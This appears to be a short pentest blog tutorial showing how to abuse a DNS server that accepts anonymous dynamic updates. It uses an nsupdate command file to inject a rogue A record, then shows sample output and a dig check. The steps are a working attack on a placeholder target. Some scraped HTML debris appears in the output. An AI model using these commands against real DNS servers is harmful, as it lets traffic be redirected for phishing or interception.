This "guide" is for Kali 2 and the basics of whats going on is the target DNS server allows anonymous DNS updates. The one tool we will need is nsupdate. If its not already on your system you can just run apt.
apt-get install dnsutilsNow we will need to start with a file that has all our commands in it. It should look something like this:
server 1.2.3.4 #our target DNS server
zone corp.company.com #the zone we are working in.
update delete evil.corp.company.com. A #rm just in case.
update add evil.corp.company.com. 86400 IN A 2.2.2.2
show
sendSave the file as dns. Now just run the following command:
nsupdate -v dnsnsupdate should read all the commands in the dns file and send them to our target DNS server. After a few seconds you should see something similar to this:
Outgoing update query:
;; ->>HEADER<<- i="" id:="" nbsp="" noerror="" opcode:="" status:="" update="">->
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; ZONE SECTION:
;corp.company.com. IN SOA
;; UPDATE SECTION:
evil.corp.company.com. 0 ANY A
evil.corp.company.com. 86400 IN A 2.2.2.2Now just run a quick DiG query to make sure it worked.
dig @1.2.3.4 A evil.corp.company.comThat is all I have for this post. Happy hacking :)